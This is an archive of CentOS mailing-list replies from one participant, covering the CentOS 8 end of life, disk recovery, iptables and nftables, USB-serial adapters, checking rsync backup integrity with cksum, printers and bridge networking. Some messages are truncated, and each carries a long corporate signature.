Re: [CentOS] CentOS 8 future
The whole issue of "support longevity" raises an issue I've been pondering, is 10-year support a good thing from a security perspective? At work we use Ubuntu LTS which has only a five year support cycle (you can pay for an extra five years) but, even with that, issues have arisen. Although they do security and bug fix updates, the package versions remain basically the same. So, if a package is on version 1.2.3, it remains 1.2.3 with bug fixes and security patches for the life of the distribution. Does Red Hat/CentOS do the same thing? The reason I ask is I ran into an issue where OpenVPN was updated in a later release to support a more robust security architecture which wasn't available until I upgraded. A configuration change could have addressed a security weakness in the older version so that the issue wasn't one of a security patch. However, the change required a lot of effort to implement. Now I'm wondering about packages in general. From: CentOS on behalf of Lamar Owen Sent: Monday, December 14, 2020 10:57 AM To: CentOS mailing list Subject: [EXTERNAL] Re: [CentOS] CentOS 8 future CAUTION: This email originated from outside of the organization. Do not click links or open attachments unless you recognize the sender and know the content is safe. Harriscomputer Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com P: [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG] 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com<http://www..com> This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. If you prefer not to be contacted by Harris Operating Group please notify us<http://subscribe.harriscomputer.com/>. This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. On 12/12/20 10:34 PM, Konstantin Boyandin via CentOS wrote: > My only concern ATM is whether RH can change its CentOS 7 maintenance > plans as well, all of a sudden. This is what bothers me, too, but in a slightly different way. Even for the GPL software, Red Hat actually doesn't have to provide public access to the source code; the only thing required by GPL is that those who receive binaries must be able to get sources. So, even though it has been said that the source will be available, well, it was also said that C8 would be supported to 2029. There are enough packages in RHEL with non-GPL licenses where it would be very difficult to rebuild the whole distribution without them, and RH is not required by those licenses (MIT, BSD, and others) to redistribute those modified sources even to people who have been distributed binaries. So, while I want to believe that the sources will remain available, that belief relies on trust, which unfortunately is less abundant these days. So while using another rebuild seems to be a good stopgap solution, I do wonder if it will prove to be sustainable post-2021. I'm personally looking at which of the four (that we know about) to possibly go to; I just really doubt I am going to use Oracle; Rocky isn't really there yet and is very young; Springdale is available, mature, and academically supported (nothing wrong with that, just a statement); CloudLinux OS Project Lenix isn't yet released. Out of the bunch, Springdale would be my first choice right now because it's been around a very long time and is available now. C8 is supposed to be around until end of 2021, so there is some time for the dust to settle and the way to become more clear, though. But CentOS 8 Stream is only an option for me if the hardware driver KABI synchronization issue is solved and stays solved. RHEL? Under the current subscription models we just can't afford it. (Cost also keeps SLES out of the running.) But I'm now seriously considering just simply going to something that is both older than Red Hat, fully and totally open, extremely well-supported by a diverse developer community, and used by a whole lot of people. Yes, that's Debian; until I realized where the name came from (Deb and Ian) it read to me like a play on 'deviant.' The 'stable' period is shorter, for sure. The tradeoffs are pretty simple: guaranteed openness versus less change for ten years. So, let's look at that last piece. CentOS 6's support just ended; what have the last nine years and three months of actual C6 support looked like? I supported several C6 machines, and there were distinct c
Re: [CentOS] External harddisk
I don't know whether testdisk would be helpful in this case or not but your options are limited, might give it a try. From: CentOS on behalf of H Sent: Friday, October 2, 2020 6:40 AM To: CentOS mailing list Subject: [EXTERNAL] Re: [CentOS] External harddisk CAUTION: This email originated from outside of the organization. Do not click links or open attachments unless you recognize the sender and know the content is safe. On October 1, 2020 12:03:34 PM EDT, Bruce Ferrell wrote: >On 9/30/20 9:11 AM, H wrote: Harriscomputer Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com P: [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG] 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com<http://www..com> This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. If you prefer not to be contacted by Harris Operating Group please notify us<http://subscribe.harriscomputer.com/>. This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. >> On 09/30/2020 12:03 PM, Simon Matter wrote: >>>> Since you have taken the disk apart it will now be useless as >within the >>>> enclosure there could have been a vacuum or an inert gas. >>> From what I know gas filled disks didn't exist in the times when >3X0GB was >>> on a 2" drive. >>> >>>> You will never be able to recover any data on the disk unless you >go and >>>> pay >>>> for a professional data recovery organisation to read the platters. >>> No, if he did care that the disks didn't become dirty then the drive >>> should still work quite well to recover what is on it. Of course the >cover >>> should be put on ASAP. If you don't believe me, just try it our >yourself. >>> >>>> The price for a replacement 340GByte USB disk is about $25 which >would >>>> give >>>> you a better product than your old disk. >>> The OP wanted to recover what is on the disk, not use it as a normal >disk. >>> >>> Simon >>> >>>> Mark >>>> >>>> -Original Message- >>>> From: H >>>> Sent: Wednesday, September 30, 2020 4:47 PM >>>> To: centos@centos.org >>>> Subject: Re: [CentOS] External harddisk >>>> >>>> On 09/30/2020 05:40 AM, John Pierce wrote: >>>>> On Tue, Sep 29, 2020, 8:33 AM H wrote: >>>>> >>>>>> I have an old external harddisk, Toshiba 320 Gb, with a USB >connector >>>>>> that >>>>>> I wanted to check for contents. It did not start up when >connected and >>>>>> I >>>>>> could not hear the motor spinning. After leaving it in the >freezer >>>>>> overnight the motor spins but it is not recognized by my >computer. I >>>>>> disassembled it and could see that the head assembly rests >outside the >>>>>> disk >>>>>> but when it is powered on, the head first moves to the center of >the >>>>>> disk, >>>>>> then to the periphery and finally back to the resting position. >This >>>>>> happens every few seconds and leaving it connected overnight >changed >>>>>> nothing. >>>>>> >>>>> That repeated seeking suggests it's not passing its self test, and >is >>>>> constantly retrying. It's probably searching for servo data on >the >>>>> disks, >>>>> and not finding it. >>>>> >>>>> ___ >>>>> CentOS mailing list >>>>> CentOS@centos.org >>>>> https://lists.centos.org/mailman/listinfo/centos >>>> I see. I have not searched for any low-level disk utility from >Toshiba, >>>> the >>>> manufacturer of the disk. Do you think that might be worthwhile to >>>> hopefully >>>> fix this? >>>> >>>> ___ >>>> CentOS mailing list >>&g
Re: [CentOS] Iptables rules not working
You haven't given us enough to make a good evaluation. Is your INPUT policy DROP? Is your ssh destination this system or elsewhere, it makes a difference. I'm hearing iptables can still be used with nftables but I haven't had need to investigate, you should look into the interaction of the two to make sure that's not causing problems. Just a couple or possibilities. I don't know if nftables still has the raw table which allows you to do an in depth (and laborious) analysis of what's happening by using the -J TRACE option but, if you can't find the issue by other means, it may be necessary. From: CentOS on behalf of Phil Perry Sent: Thursday, July 16, 2020 10:54 AM To: centos@centos.org Subject: [EXTERNAL] Re: [CentOS] Iptables rules not working CAUTION: This email originated from outside of the organization. Do not click links or open attachments unless you recognize the sender and know the content is safe. Harriscomputer Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG] 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com<http://www..com> This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. If you prefer not to be contacted by Harris Operating Group please notify us<http://subscribe.harriscomputer.com/>. This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. On 16/07/2020 16:48, Kaushal Shriyan wrote: > Hi, > > I am running CentOS Linux release 8.2.2004 (Core) on a remote server. I am > running the below iptables command to allow SSH port 22 from a specific > source IP 219.91.200.59 > > iptables -A INPUT -m tcp -p tcp -s 219.91.200.59 --dport 22 -j ACCEPT >> service iptables save > > > The above iptables ruleset is not working and I am still able to connect > from the internet to SSH port 22. I look forward to hearing from you and > thanks in advance. > > Best Regards, > > Kaushal EL8 does not use iptables by default - it's been replaced with nftables. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] USB-serial adapter for CentOS 7
-> "nobody uses RS232 anymore!" Somebody needs to update the hand writing on the wall, although the physical hardware may be an RJ-45, the RS232 protocol is still used on headless devices and probably other things. I use minicom more than I wish but it's still required. From: CentOS on behalf of mailist Sent: Wednesday, July 8, 2020 11:11 AM To: CentOS mailing list Subject: [EXTERNAL] Re: [CentOS] USB-serial adapter for CentOS 7 CAUTION: This email originated from outside of the organization. Do not click links or open attachments unless you recognize the sender and know the content is safe. Harriscomputer Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG] 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com<http://www..com> This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. If you prefer not to be contacted by Harris Operating Group please notify us<http://subscribe.harriscomputer.com/>. This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. On 2020-07-08 11:28, Tate Belden wrote: > I've several USB <-> RS-232 dongles around. As well as a few embedded > devices. They all "Just Work (tm)" on Redhat, CentOS, Fedora, Debian, > Raspian and Kali. Even if you did have an RS232 port on the box, the serial drivers for CentOS 7 have never worked correctly. I had an application using RS232 that worked perfectly under CentOS 6, and then worked intermittently under CentOS 7, and failed miserably on CentOS 8. The handwriting on the RedHat wall says, "nobody uses RS232 anymore!" I moved the app to a Raspberry Pi 3B+, using the USB serial adapters, and it works perfectly again. Todd Merriman Software Toolz, Inc. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
[CentOS] USB-serial adapter for CentOS 7
I've used one on a Linux laptop, it "just worked" but the OS wasn't CentOS 7. From: CentOS on behalf of H Sent: Wednesday, July 8, 2020 10:13 AM To: Centos Mailing List Subject: [EXTERNAL] [CentOS] USB-serial adapter for CentOS 7 CAUTION: This email originated from outside of the organization. Do not click links or open attachments unless you recognize the sender and know the content is safe. I need to connect an older APS UPS unit to a machine running CentOS 7. Unfortunately the UPS only has a serial port whereas the computer does not. I am aware that there are USB-serial adapters but that the hardware or the drivers might fall short of expectations. Does anyone have positive experience with such an adapter? Or, conversely, would recommend avoid a particular adapter? ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos Harriscomputer Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG] 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com<http://www..com> This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. If you prefer not to be contacted by Harris Operating Group please notify us<http://subscribe.harriscomputer.com/>. This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] [OT] Bacula offsite replication
Depending on the definition of offsite, you have a fundamental problem: either invest the time/effort compressing or take extra bandwidth, which is less costly? Hopefully a delta transfer makes sense in your situation and should save far more than compression would once the original copy is offsite. From: CentOS on behalf of Valeri Galtsev Sent: Thursday, July 2, 2020 8:02 AM To: centos@centos.org Subject: [EXTERNAL] Re: [CentOS] [OT] Bacula offsite replication CAUTION: This email originated from outside of the organization. Do not click links or open attachments unless you recognize the sender and know the content is safe. Harriscomputer Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG] 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com<http://www..com> This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. If you prefer not to be contacted by Harris Operating Group please notify us<http://subscribe.harriscomputer.com/>. This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. On 7/2/20 3:22 AM, Alessandro Baggi wrote: > Il 01/07/20 17:13, Leroy Tennison ha scritto: >> I realize this shouldn't happen, the file is a tgz and isn't being >> modified while being transmitted. This has happened maybe three times >> this year and unfortunately I've just had to deal with it rather than >> invest the time to do the research. >> >> >> Harriscomputer >> >> Leroy Tennison >> Network Information/Cyber Security Sp > > Hi Leroy, > > I think that in my case I could not use a tgz archive. I'm speaking > about full backups that reach 600/700GiB, compressing them and then > rsync them could take so much time that it will be useless. > unless you use tape (of that high capacity), it is advantageous to restrict volume size to, say, 50GB. Then when you restore, search for specific files will be faster. And it will help your backup volumes transfers as well. Valeri > ___ > CentOS mailing list > CentOS@centos.org > https://lists.centos.org/mailman/listinfo/centos -- Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] [OT] Bacula offsite replication
I realize this shouldn't happen, the file is a tgz and isn't being modified while being transmitted. This has happened maybe three times this year and unfortunately I've just had to deal with it rather than invest the time to do the research. Harriscomputer Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG] 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com<http://www..com> This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. If you prefer not to be contacted by Harris Operating Group please notify us<http://subscribe.harriscomputer.com/>. This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. From: Chris Schanzle Sent: Wednesday, July 1, 2020 10:03 AM To: CentOS mailing list ; Leroy Tennison Subject: [EXTERNAL] Re: [CentOS] [OT] Bacula offsite replication CAUTION: This email originated from outside of the organization. Do not click links or open attachments unless you recognize the sender and know the content is safe. Unless the file is being modified during rsync, corruption should not happen with good hardware. Consider testing your RAM. Have you noticed any other weird problems with that remote server, like programs crashing / daemons needing restarting? On 7/1/20 10:37 AM, Leroy Tennison wrote: > What I did was used cksum to create a checksum of the source file putting it > in a separate file, transmitted that via rsync as well and compared that to a > cksum computed on the remote end. There are far more accurate alternatives > to cksum but I felt cksum was good enough for a basic check. Like most > things in the UNIX world, there are probably other ways to do this as well. > > Interestingly enough, after I sent my previous response I discovered that I > had yet another instance of the problem. > > > From: CentOS on behalf of Alessandro Baggi > > Sent: Wednesday, July 1, 2020 9:26 AM > To: centos@centos.org > Subject: [EXTERNAL] Re: [CentOS] [OT] Bacula offsite replication > > CAUTION: This email originated from outside of the organization. Do not click > links or open attachments unless you recognize the sender and know the > content is safe. > > > Hi Leroy, > > How I can confirm that during rsync transfer corruption are not encountered? > > Thank you in advance. > > > Harriscomputer > > Leroy Tennison > Network Information/Cyber Security Specialist > E: le...@datavoiceint.com > > > [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG] > > > 2220 Bush Dr > McKinney, Texas > 75070 > https://linkprotect.cudasvc.com/url?a=http%3a%2f%2fwww.datavoiceint.com%2f=E,1,00uoVithcdoZKfdE0IJM8LvvYxwVLFDjVaj-PErs6HOprVgQbdBE1Ev3mXF3w6PUc_C_6eI1odWQtpYUTMU3wRbhn6gDS_pSCiRBZdG-fqPzGNsgh2ZNZFujh1s,=1> > > > This message has been sent on behalf of a company that is part of the Harris > Operating Group of Constellation Software Inc. > > If you prefer not to be contacted by Harris Operating Group please notify > us<https://linkprotect.cudasvc.com/url?a=http%3a%2f%2fsubscribe.harriscomputer.com%2f=E,1,ESghWsZAKB3kZUcHUH6MS2ivZGjhaE3linFZeLtQ96hbUtv37Esy1OON4XdoFr1DjlanYK_dt8Kie6diqCOVrkPalJ6KDLXEocN-5BFabl2AiHWvFfo3VvM,=1>. > > > > This message is intended exclusively for the individual or entity to which it > is addressed. This communication may contain information that is proprietary, > privileged or confidential or otherwise legally exempt from disclosure. If > you are not the named addressee, you are not authorized to read, print, > retain, copy or disseminate this message or any part of it. If you have > received this message in error, please notify the sender immediately by > e-mail and delete all copies of the message. > > > > > > Il 01/07/20 16:04, Leroy Tennison ha scritto: >> I've used rsync (but probably not for the size you're referring to), it >> works and has enough features to meet most needs. I have had a single >> situation where corruption occurred during transfer (a few times, have no >> idea why), might want to independently confirm the integrity of the transfer. >> >> _
Re: [CentOS] [OT] Bacula offsite replication
What I did was used cksum to create a checksum of the source file putting it in a separate file, transmitted that via rsync as well and compared that to a cksum computed on the remote end. There are far more accurate alternatives to cksum but I felt cksum was good enough for a basic check. Like most things in the UNIX world, there are probably other ways to do this as well. Interestingly enough, after I sent my previous response I discovered that I had yet another instance of the problem. From: CentOS on behalf of Alessandro Baggi Sent: Wednesday, July 1, 2020 9:26 AM To: centos@centos.org Subject: [EXTERNAL] Re: [CentOS] [OT] Bacula offsite replication CAUTION: This email originated from outside of the organization. Do not click links or open attachments unless you recognize the sender and know the content is safe. Hi Leroy, How I can confirm that during rsync transfer corruption are not encountered? Thank you in advance. Harriscomputer Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG] 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com<http://www..com> This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. If you prefer not to be contacted by Harris Operating Group please notify us<http://subscribe.harriscomputer.com/>. This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. Il 01/07/20 16:04, Leroy Tennison ha scritto: > I've used rsync (but probably not for the size you're referring to), it works > and has enough features to meet most needs. I have had a single situation > where corruption occurred during transfer (a few times, have no idea why), > might want to independently confirm the integrity of the transfer. > > > From: CentOS on behalf of Alessandro Baggi > > Sent: Wednesday, July 1, 2020 5:26 AM > To: centos@centos.org > Subject: [EXTERNAL] [CentOS] [OT] Bacula offsite replication > > CAUTION: This email originated from outside of the organization. Do not click > links or open attachments unless you recognize the sender and know the > content is safe. > > > Hi everyone, > > I have updated my backup server to CentOS 8.2. It runs bacula performing > backup on disks. I would like to replicate backups on another offsite > machine. > > I read about the ability to configure a new storage daemon in the > offsite location and create a Migration/Copy Jobs. If I'm not wrong, it > replicates only volumes but not replicate the catalog. I will try this. > > Another way to replicate the volumes on another server is using rsync. > > What is your suggestion about this topic? > > Thank you in advance. > > Alessandro. > > ___ > CentOS mailing list > CentOS@centos.org > https://lists.centos.org/mailman/listinfo/centos > > Harriscomputer > > Leroy Tennison > Network Information/Cyber Security Specialist > E: le...@datavoiceint.com > > > [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG] > > > 2220 Bush Dr > McKinney, Texas > 75070 > https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fwww.datavoiceint.com=E,1,NcuZo7bJlNfnwFN_1U7Eb0PpothLaHlm35UVdQMBqG8TH6hZvo3iMVLxCy4ZNUIAWOktkvYozTYnDWfj0JIvc22V52YUkDfms1NFI7AXHA,,=1<http://www..com> > > > This message has been sent on behalf of a company that is part of the Harris > Operating Group of Constellation Software Inc. > > If you prefer not to be contacted by Harris Operating Group please notify > us<https://linkprotect.cudasvc.com/url?a=http%3a%2f%2fsubscribe.harriscomputer.com%2f=E,1,4UMyprULKejN76Lk4p9zM-laz6VtwtLbbjIU8e02p6oWiLS-njfZsTFuXkb0910-WrqQ8x6J4YCieJO5HeN2WGf7pqwFdtVkKJi-m_QGliIsyR6XTAVohBrv=1>. > > > > This message is intended exclusively for the individual or entity to which it > is addressed. This communication may contain information that is proprietary, > privileged or confidential or otherwise legally exempt from disclosure. If > you are not the named addressee, you are not authorized to read, print, > retain, copy or disseminate this message or any part of it. If you have > received this message in error, plea
[CentOS] [OT] Bacula offsite replication
I've used rsync (but probably not for the size you're referring to), it works and has enough features to meet most needs. I have had a single situation where corruption occurred during transfer (a few times, have no idea why), might want to independently confirm the integrity of the transfer. From: CentOS on behalf of Alessandro Baggi Sent: Wednesday, July 1, 2020 5:26 AM To: centos@centos.org Subject: [EXTERNAL] [CentOS] [OT] Bacula offsite replication CAUTION: This email originated from outside of the organization. Do not click links or open attachments unless you recognize the sender and know the content is safe. Hi everyone, I have updated my backup server to CentOS 8.2. It runs bacula performing backup on disks. I would like to replicate backups on another offsite machine. I read about the ability to configure a new storage daemon in the offsite location and create a Migration/Copy Jobs. If I'm not wrong, it replicates only volumes but not replicate the catalog. I will try this. Another way to replicate the volumes on another server is using rsync. What is your suggestion about this topic? Thank you in advance. Alessandro. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos Harriscomputer Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG] 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com<http://www..com> This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. If you prefer not to be contacted by Harris Operating Group please notify us<http://subscribe.harriscomputer.com/>. This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] HP vs. Brother Printers: Use with Centos/Fedora
Our office has had a Brother MFC-8510DN for at least five years - no issues. As has been said below, you do have to download and install the driver but the process hasn't been problematic. Having said that, I haven't pushed the limit on it's capabilities, just done rather plain printing. From: CentOS on behalf of Ron Loftin Sent: Saturday, June 27, 2020 5:02 PM To: centos@centos.org Subject: [EXTERNAL] Re: [CentOS] HP vs. Brother Printers: Use with Centos/Fedora CAUTION: This email originated from outside of the organization. Do not click links or open attachments unless you recognize the sender and know the content is safe. Harriscomputer Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG] 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com<http://www..com> This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. If you prefer not to be contacted by Harris Operating Group please notify us<http://subscribe.harriscomputer.com/>. This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. On Sat, 2020-06-27 at 15:44 -0600, Frank Cox wrote: > On Sat, 27 Jun 2020 17:33:39 -0400 > Jay Hart wrote: > > > > > If you had to rate which printer brand works better with Linux > > (Fedora and > > Centos), what would it be? > Any Brother printer that I've ever had the misfortune to have to deal > with either didn't work at all or if could be made to work, it didn't > work for long. > > If it's a Brother, run away as fast as you can. They're the cheapest > crappiest thing you can possibly imagine. > > My wife makes quilts and says the same thing about Brother sewing > machines. > I can't speak to the sewing machines, but I have to say that I've had very good luck with Brother printers. However, we have to be honest and acknowledge that I'm talking about LASER printers, not the $%^&* inkjet silliness. In my DEFINITELY not-so-humble opinion, the "run away as fast as you can" advice applies to ALL inkjets that are intended for home use. The only real differences I'm aware of between Brother and HP LASER printers are price, and the fact that the HP drivers are usually included in the distribution by default, and you have to download and install the Brother drivers. I'm sitting next to a Brother MFC L- 2750DW that is a year or so old, and it does everything I need it to. As always, YMMV. -- Ron Loftin relof...@twcny.rr.com "God, root, what is difference ?" Piter from UserFriendly ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
[CentOS] firewall help request
Is your policy accept? It is possible to trace the packet through the netfilter path by setting up raw table rules with TRACE as the target and logging turned on (search the web for details - probably too much to post here) but be aware that you need a very controlled test because the syslog entries will likely be an order of magnitude greater than the actual packet count. From: CentOS on behalf of david Sent: Tuesday, June 16, 2020 2:21 PM To: CentOS mailing list Subject: [EXTERNAL] [CentOS] firewall help request CAUTION: This email originated from outside of the organization. Do not click links or open attachments unless you recognize the sender and know the content is safe. Folks I'm struggling with my firewall settings, and would appreciate some help. I have a gateway machine (currently Centos 7 with IPV4 only) with two NICs. One is connected to the internet, the other to an internal network (10.0.0.0/24) of mixed hardware (windows7, android tablets, android phones, linux boxes) using NAT. I wish to block all outgoing connects to any external IP address on port 22 (ssh) originating from any internal machine except one (which has a known internal IP address). I've tried some commands using 'iptables' to accomplish this, but so far have failed. If anyone has a suggestion, I'd really appreciate it. In addition, a suitable version for 'firewalld' could be useful, as an upgrade to Centos 8 is in plan. Examples of what I've tried, and then tested. None of them stopped an outgoing SSH from an internal system. iptables -I INPUT -p tcp --dport 22 -s 10.0.0.0/24 -j DROP iptables -I INPUT -p tcp --dport 22 -s 10.0.0.0/24 -j DROP Much thanks David ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos Harriscomputer Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG] 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com<http://www..com> This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. If you prefer not to be contacted by Harris Operating Group please notify us<http://subscribe.harriscomputer.com/>. This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
[CentOS] Bridge network for virt-manager
I haven't done bridging on CentOS but, in the setups I've done, you need to associate a physical NIC such as eth0 with the bridge. From: CentOS on behalf of Jerry Geis Sent: Tuesday, June 2, 2020 5:38 AM To: CentOS mailing list Subject: [EXTERNAL] [CentOS] Bridge network for virt-manager CAUTION: This email originated from outside of the organization. Do not click links or open attachments unless you recognize the sender and know the content is safe. Hello. I desire to get bridge network working using virt-manager. Centos 7 and centos 7 guest. >From researching I think I need to have a ifcfg-br0 file like this ? cat ifcfg-br0 DEVICE=nm-bridge0 STP=no TYPE=Bridge BOOTPROTO=none IPADDR=192.168.1.8 PREFIX=32 GATEWAY=192.168.1.1 IPV6INIT=no NAME=br0 ONBOOT=yes DELAY=0 Is that for sure needed ? The use that nm-bridge0 as the network name? I dont want to mess up my current setup. Thanks, Jerry ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos Harriscomputer Leroy Tennison Network Information/Cyber Security Specialist E: le...@datavoiceint.com [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG] 2220 Bush Dr McKinney, Texas 75070 www.datavoiceint.com<http://www..com> This message has been sent on behalf of a company that is part of the Harris Operating Group of Constellation Software Inc. If you prefer not to be contacted by Harris Operating Group please notify us<http://subscribe.harriscomputer.com/>. This message is intended exclusively for the individual or entity to which it is addressed. This communication may contain information that is proprietary, privileged or confidential or otherwise legally exempt from disclosure. If you are not the named addressee, you are not authorized to read, print, retain, copy or disseminate this message or any part of it. If you have received this message in error, please notify the sender immediately by e-mail and delete all copies of the message. ___ CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
Re: [CentOS] Zoom?
